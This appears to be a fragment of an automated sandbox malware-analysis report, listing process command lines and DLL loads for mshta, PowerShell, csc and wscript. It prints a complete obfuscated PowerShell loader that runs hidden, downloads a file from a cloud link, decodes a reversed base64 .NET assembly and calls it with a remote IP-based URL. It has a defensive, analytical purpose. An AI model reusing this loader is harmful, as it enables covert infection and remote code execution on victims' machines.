CcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
